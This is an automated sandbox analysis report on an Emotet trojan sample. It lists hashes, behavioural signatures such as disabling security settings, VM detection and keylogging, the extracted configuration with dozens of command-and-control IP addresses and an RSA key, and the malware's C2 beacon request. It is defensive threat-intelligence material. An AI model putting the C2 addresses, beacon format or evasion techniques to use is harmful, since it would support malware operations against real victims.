Loading ...

Play interactive tourEdit tour

Analysis Report SecuriteInfo.com.Trojan.DownLoader34.14215.6565.8121

Overview

General Information

Sample Name:SecuriteInfo.com.Trojan.DownLoader34.14215.6565.8121 (renamed file extension from 8121 to exe)
Analysis ID:255721
MD5:556984bce9f182c5b2129469ee3d6a5c
SHA1:54dfec53ef5204ab24466095e5a98496ec0381bf
SHA256:6c30ca2d6217c2098b476c04357dedb93e1857ebf5ff25fb01723d9174580b06

Most interesting Screenshot:

Detection

Emotet
Score:76
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Emotet
Changes security center settings (notifications, updates, antivirus, firewall)
Drops executables to the windows directory (C:\Windows) and starts them
Hides that the sample has been downloaded from the Internet (zone.identifier)
AV process strings found (often used to terminate AV products)
Checks if Antivirus/Antispyware/Firewall program is installed (via WMI)
Contains capabilities to detect virtual machines
Contains functionality to check if a window is minimized (may be used to check if an application is visible)
Contains functionality to dynamically determine API calls
Contains functionality to query locales information (e.g. system language)
Contains functionality to read the PEB
Creates files inside the system directory
Deletes files inside the Windows folder
Detected TCP or UDP traffic on non-standard ports
Detected potential crypto function
Drops PE files to the windows directory (C:\Windows)
Found potential string decryption / allocating functions
May sleep (evasive loops) to hinder dynamic analysis
PE file contains strange resources
Potential key logger detected (key state polling based)
Queries disk information (often used to detect virtual machines)
Queries the volume information (name, serial number etc) of a device
Sample execution stops while process was sleeping (likely an evasion)
Sample file is different than original file name gathered from version info
Tries to connect to HTTP servers, but all servers are down (expired dropper behavior)
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w10x64
  • svchost.exe (PID: 1876 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6156 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6572 cmdline: c:\windows\system32\svchost.exe -k networkservice -p -s DoSvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6612 cmdline: C:\Windows\System32\svchost.exe -k NetworkService -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • SgrmBroker.exe (PID: 396 cmdline: C:\Windows\system32\SgrmBroker.exe MD5: D3170A3F3A9626597EEE1888686E3EA6)
  • svchost.exe (PID: 1884 cmdline: c:\windows\system32\svchost.exe -k unistacksvcgroup MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6512 cmdline: c:\windows\system32\svchost.exe -k localservicenetworkrestricted -p -s wscsvc MD5: 32569E403279B3FD2EDB7EBD036273FA)
    • MpCmdRun.exe (PID: 1072 cmdline: 'C:\Program Files\Windows Defender\mpcmdrun.exe' -wdenable MD5: A267555174BFA53844371226F482B86B)
      • conhost.exe (PID: 4876 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: EA777DEEA782E8B4D7C7C33BBF8A4496)
  • svchost.exe (PID: 5604 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • svchost.exe (PID: 6448 cmdline: C:\Windows\System32\svchost.exe -k netsvcs -p MD5: 32569E403279B3FD2EDB7EBD036273FA)
  • cleanup

Malware Configuration

Threatname: Emotet

{"C2 list": ["187.64.128.197:80", "198.57.203.63:8080", "163.172.107.70:8080", "212.112.113.235:80", "157.7.164.178:8081", "181.167.35.84:80", "212.156.133.218:80", "185.142.236.163:443", "181.143.101.19:8080", "75.127.14.170:8080", "115.165.3.213:80", "190.55.233.156:80", "139.59.12.63:8080", "144.139.91.187:80", "37.70.131.107:80", "181.113.229.139:443", "41.185.29.128:8080", "177.37.81.212:443", "5.79.70.250:8080", "78.188.170.128:80", "190.111.215.4:8080", "50.116.78.109:8080", "75.139.38.211:80", "140.207.113.106:443", "192.241.220.183:8080", "192.210.217.94:8080", "81.17.93.134:80", "181.164.110.7:80", "190.164.75.175:80", "201.214.108.231:80", "94.96.60.191:80", "192.163.221.191:8080", "91.83.93.103:443", "51.38.201.19:7080", "24.157.25.203:80", "81.214.253.80:443", "87.106.231.60:8080", "37.46.129.215:8080", "195.201.56.70:8080", "201.235.10.215:80", "107.161.30.122:8080", "113.160.180.109:80", "87.252.100.28:80", "115.79.195.246:80", "113.161.148.81:80", "74.208.173.91:8080", "46.105.131.68:8080", "172.105.78.244:8080", "189.146.1.78:443", "216.75.37.196:8080", "203.153.216.182:7080", "153.220.182.49:80", "181.134.9.162:80", "178.33.167.120:8080", "46.49.124.53:80", "143.95.101.72:8080", "77.74.78.80:443", "203.153.216.178:7080", "179.5.118.12:80", "24.232.36.99:80", "177.144.130.105:443", "46.32.229.152:8080", "89.108.158.234:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}

Yara Overview

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000001.00000002.488528706.0000000000700000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
    00000000.00000002.226321958.0000000002270000.00000040.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
      00000000.00000002.226329464.0000000002281000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security
        00000001.00000002.488556425.0000000000711000.00000020.00000001.sdmpJoeSecurity_EmotetYara detected EmotetJoe Security

          Sigma Overview

          No Sigma rule has matched

          Signature Overview

          Click to jump to signature section

          Show All Signature Results

          AV Detection:

          barindex
          Found malware configurationShow sources
          Source: 00000001.00000002.488528706.0000000000700000.00000040.00000001.sdmpMalware Configuration Extractor: Emotet {"C2 list": ["187.64.128.197:80", "198.57.203.63:8080", "163.172.107.70:8080", "212.112.113.235:80", "157.7.164.178:8081", "181.167.35.84:80", "212.156.133.218:80", "185.142.236.163:443", "181.143.101.19:8080", "75.127.14.170:8080", "115.165.3.213:80", "190.55.233.156:80", "139.59.12.63:8080", "144.139.91.187:80", "37.70.131.107:80", "181.113.229.139:443", "41.185.29.128:8080", "177.37.81.212:443", "5.79.70.250:8080", "78.188.170.128:80", "190.111.215.4:8080", "50.116.78.109:8080", "75.139.38.211:80", "140.207.113.106:443", "192.241.220.183:8080", "192.210.217.94:8080", "81.17.93.134:80", "181.164.110.7:80", "190.164.75.175:80", "201.214.108.231:80", "94.96.60.191:80", "192.163.221.191:8080", "91.83.93.103:443", "51.38.201.19:7080", "24.157.25.203:80", "81.214.253.80:443", "87.106.231.60:8080", "37.46.129.215:8080", "195.201.56.70:8080", "201.235.10.215:80", "107.161.30.122:8080", "113.160.180.109:80", "87.252.100.28:80", "115.79.195.246:80", "113.161.148.81:80", "74.208.173.91:8080", "46.105.131.68:8080", "172.105.78.244:8080", "189.146.1.78:443", "216.75.37.196:8080", "203.153.216.182:7080", "153.220.182.49:80", "181.134.9.162:80", "178.33.167.120:8080", "46.49.124.53:80", "143.95.101.72:8080", "77.74.78.80:443", "203.153.216.178:7080", "179.5.118.12:80", "24.232.36.99:80", "177.144.130.105:443", "46.32.229.152:8080", "89.108.158.234:8080"], "RSA Public Key": "MHwwDQYJKoZIhvcNAQEBBQADawAwaAJhAM/TXLLvX91I6dVMYe+T1PPO6mpcg7OJ\ncMl9o/g4nUhZOp8fAAmQl8XMXeGvDhZXTyX1AXf401iPFui0RB6glhl/7/djvi7j\nl32lAhyBANpKGty8xf3J5kGwwClnG/CXHQIDAQAB"}
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_0042853B __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,0_2_0042853B
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_004026E0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,0_2_004026E0
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00428B68 lstrlenA,FindFirstFileA,FindClose,0_2_00428B68
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_00401640 FindFirstFileA,FindClose,0_2_00401640
          Source: C:\Users\user\Desktop\SecuriteInfo.com.Trojan.DownLoader34.14215.6565.exeCode function: 0_2_022828B7 FindFirstFileW,FindNextFileW,FindClose,0_2_022828B7
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_0042853B __EH_prolog,GetFullPathNameA,lstrcpynA,PathIsUNCA,GetVolumeInformationA,CharUpperA,FindFirstFileA,FindClose,lstrlenA,lstrcpyA,1_2_0042853B
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_004026E0 FindFirstFileA,FindNextFileA,FindNextFileA,FindClose,1_2_004026E0
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00428B68 lstrlenA,FindFirstFileA,FindClose,1_2_00428B68
          Source: C:\Windows\SysWOW64\TaskSchdPS\bcryptprimitives.exeCode function: 1_2_00401640 FindFirstFileA,FindClose,1_2_00401640

          Networking:

          barindex
          Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)Show sources
          Source: TrafficSnort IDS: 2404324 ET CNC Feodo Tracker Reported CnC Server TCP group 13 192.168.2.4:49723 -> 198.57.203.63:8080
          Source: global trafficTCP traffic: 192.168.2.4:49723 -> 198.57.203.63:8080
          Source: global trafficTCP traffic: 192.168.2.4:49714 -> 187.64.128.197:80
          Source: global trafficHTTP traffic detected: POST /CDVLjF8CqA3AEb/ HTTP/1.1Referer: http://198.57.203.63/CDVLjF8CqA3AEb/Content-Type: multipart/form-data; boundary=---------------------------677737143348962User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 198.57.203.63:8080Content-Length: 4580Connection: Keep-AliveCache-Control: no-cache
          Source: unknownTCP traffic detected without corresponding DNS query: 187.64.128.197
          Source: unknownTCP traffic detected without corresponding DNS query: 187.64.128.197
          Source: unknownTCP traffic detected without corresponding DNS query: 187.64.128.197
          Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: unknownTCP traffic detected without corresponding DNS query: 198.57.203.63
          Source: svchost.exe, 0000000F.00000003.386930124.0000015B9694A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.facebook.com (Facebook)
          Source: svchost.exe, 0000000F.00000003.386930124.0000015B9694A000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI", equals www.twitter.com (Twitter)
          Source: svchost.exe, 0000000F.00000003.386885941.0000015B96964000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
          Source: svchost.exe, 0000000F.00000003.386885941.0000015B96964000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","ProductTitle":"Spotify Music","SearchTitles":[{"SearchTitleString":"Spotify","SearchTitleType":"SearchHint"},{"SearchTitleString":"Music","SearchTitleType":"SearchHint"},{"SearchTitleString":"music apps","SearchTitleType":"SearchHint"},{"SearchTitleString":"free music","SearchTitleType":"SearchHint"},{"SearchTitleString":"pandora","SearchTitleType":"SearchHint"},{"SearchTitleString":"streaming","SearchTitleType":"SearchHint"},{"SearchTitleString":"soundcloud","SearchTitleType":"SearchHint"}],"Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN","MS","MZ","MM","NA","NR","NP","MV","ML","NC","NI","NE","NU","NF","PW","PS","PA","PG","PY","RE","RW","BL","MF","WS","ST","SN","MP","PN","SX","SB","SO","SC","SL","GS","SH","KN","LC","PM","VC","TJ","TZ","TG","TK","TO","TM","TC","TV","UM","UG","VI","VG","WF","EH","ZM","ZW","UZ","VU","SR","SZ","AD","MC","SM","ME","VA","NEUTRAL"]}],"MarketProperties":[{"RelatedProducts":[],"Markets":["US"]}],"ProductASchema":"Product;3","ProductBSchema":"ProductUnifiedApp;3","ProductId":"9NCBCSZSJRSB","Properties":{"PackageFamilyName":"SpotifyAB.SpotifyMusic_zpdnekdrzrea0","PackageIdentityName":"SpotifyAB.SpotifyMusic","PublisherCertificateName":"CN=453637B3-4E12-4CDF-B0D3-2A3C863BF6EF"},"AlternateIds":[{"IdType":"LegacyWindowsStoreProductId","Value":"ceac5d3f-8a4f-40e1-9a67-76d9108c7cb5"},{"IdType":"LegacyWindowsPhoneProductId","Value":"caac1b9d-621b-4f96-b143-e10e1397740a"},{"IdType":"XboxTitleId","Value":"1681279293"}],"IngestionSource":"DCE","IsMicrosoftProduct":false,"PreferredSkuId":"0010","ProductType":"Application","ValidationData":{"PassedValidation":false,"RevisionId":"2020-07-27T07:14:35.6749414Z||.||121f780f-ffc5-478c-bf53-6b53ed02cb1e||1152921505690835751||Null||fullrelease","ValidationResultUri":""},"MerchandizingTags":[],"PartD":"","ProductFamily":"Apps","ProductKind":"Application","DisplaySkuAvailabilities":[{"Sku":{"LastModifiedDate":"2020-07-27T07:13:24.2771771Z","LocalizedProperties":[{"SkuDescript
          Source: svchost.exe, 0000000F.00000003.386905404.0000015B9695B000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN"," equals www.facebook.com (Facebook)
          Source: svchost.exe, 0000000F.00000003.386905404.0000015B9695B000.00000004.00000001.sdmpString found in binary or memory: Try it free for 30 days, no strings attached\r\n\r\nLike us on Facebook: http://www.facebook.com/spotify \r\nFollow us on Twitter: http://twitter.com/spotify","SkuTitle":"Spotify Music","Language":"en-us","Markets":["US","DZ","AR","AU","AT","BH","BD","BE","BR","BG","CA","CL","CN","CO","CR","HR","CY","CZ","DK","EG","EE","FI","FR","DE","GR","GT","HK","HU","IS","IN","ID","IQ","IE","IL","IT","JP","JO","KZ","KE","KW","LV","LB","LI","LT","LU","MY","MT","MR","MX","MA","NL","NZ","NG","NO","OM","PK","PE","PH","PL","PT","QA","RO","RU","SA","RS","SG","SK","SI","ZA","KR","ES","SE","CH","TW","TH","TT","TN","TR","UA","AE","GB","VN","YE","LY","LK","UY","VE","AF","AX","AL","AS","AO","AI","AQ","AG","AM","AW","BO","BQ","BA","BW","BV","IO","BN","BF","BI","KH","CM","CV","KY","CF","TD","TL","DJ","DM","DO","EC","SV","GQ","ER","ET","FK","FO","FJ","GF","PF","TF","GA","GM","GE","GH","GI","GL","GD","GP","GU","GG","GN","GW","GY","HT","HM","HN","AZ","BS","BB","BY","BZ","BJ","BM","BT","KM","CG","CD","CK","CX","CC","CI","CW","JM","SJ","JE","KI","KG","LA","LS","LR","MO","MK","MG","MW","IM","MH","MQ","MU","YT","FM","MD","MN"," equals www.twitter.com (Twitter)
          Source: unknownHTTP traffic detected: POST /CDVLjF8CqA3AEb/ HTTP/1.1Referer: http://198.57.203.63/CDVLjF8CqA3AEb/Content-Type: multipart/form-data; boundary=---------------------------677737143348962User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.2; WOW64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)Host: 198.57.203.63:8080Content-Length: 4580Connection: Keep-AliveCache-Control: no-cache
          Source: bcryptprimitives.exe, 00000001.00000002.491630602.0000000002852000.00000004.00000001.sdmpString found in binary or memory: http://187.64.128.197/stuk9tIC/nEGJJNQ1hPRK6JQiF/87YRAVuaYuO7m/
          Source: bcryptprimitives.exe, 00000001.00000002.491630602.0000000002852000.00000004.00000001.sdmpString found in binary or memory: http://187.64.128.197/stuk9tIC/nEGJJNQ1hPRK6JQiF/87YRAVuaYuO7m/y$
          Source: bcryptprimitives.exe, 00000001.00000002.491680507.0000000002864000.00000004.00000001.sdmpString found in binary or memory: http://198.57.203.63/CDVLjF8CqA3AEb/
          Source: bcryptprimitives.exe, 00000001.00000002.491680507.0000000002864000.00000004.00000001.sdmpString found in binary or memory: http://198.57.203.63:8080/CDVLjF8CqA3AEb/
          Source: bcryptprimitives.exe, 00000001.00000002.491680507.0000000002864000.00000004.00000001.sdmpString found in binary or memory: http://198.57.203.63:8080/CDVLjF8CqA3AEb/=
          Source: bcryptprimitives.exe, 00000001.00000002.491630602.0000000002852000.00000004.00000001.sdmpString found in binary or memory: http://198.57.203.63:8080/CDVLjF8CqA3AEb/K6JQiF/87YRAVuaYuO7m/
          Source: svchost.exe, 00000004.00000002.491328545.000002935E212000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388392239.0000015B9693C000.00000004.00000001.sdmpString found in binary or memory: http://crl3.digicert.com/Omniroot2025.crl0=
          Source: svchost.exe, 00000004.00000002.491328545.000002935E212000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388392239.0000015B9693C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.digicert.com0:
          Source: svchost.exe, 00000004.00000002.491328545.000002935E212000.00000004.00000001.sdmp, svchost.exe, 0000000F.00000003.388392239.0000015B9693C000.00000004.00000001.sdmpString found in binary or memory: http://ocsp.msocsp.com0
          Source: svchost.exe, 00000004.00000002.490956253.000002935E180000.00000002.00000001.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous.
          Source: svchost.exe, 00000008.00000002.303564842.000001EAE4613000.00000004.00000001.sdmpString found in binary or memory: http://www.bingmapsportal.com
          Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmpString found in binary or memory: https://appexmapsappupdate.blob.core.windows.net
          Source: svchost.exe, 00000008.00000003.303282922.000001EAE464B000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Locations
          Source: svchost.exe, 00000008.00000002.303656860.000001EAE463E000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/REST/v1/Routes/
          Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/logging.ashx
          Source: svchost.exe, 00000008.00000003.303214683.000001EAE464F000.00000004.00000001.sdmpString found in binary or memory: https://dev.ditu.live.com/mapcontrol/mapconfiguration.ashx?name=native&v=
          Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Imagery/Copyright/
          Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/JsonFilter/VenueMaps/data/
          Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Locations
          Source: svchost.exe, 00000008.00000002.303656860.000001EAE463E000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/
          Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Driving
          Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Transit
          Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Routes/Walking
          Source: svchost.exe, 00000008.00000003.281314548.000001EAE4630000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Traffic/Incidents/
          Source: svchost.exe, 00000008.00000003.303345773.000001EAE4641000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/REST/v1/Transit/Schedules/
          Source: svchost.exe, 00000008.00000003.303345773.000001EAE4641000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/HumanScaleServices/GetBubbles.ashx?n=
          Source: svchost.exe, 00000008.00000003.303261107.000001EAE4660000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/mapcontrol/logging.ashx
          Source: svchost.exe, 00000008.00000003.303312796.000001EAE4646000.00000004.00000001.sdmpString found in binary or memory: https://dev.virtualearth.net/webservices/v1/LoggingService/LoggingService.svc/Log?
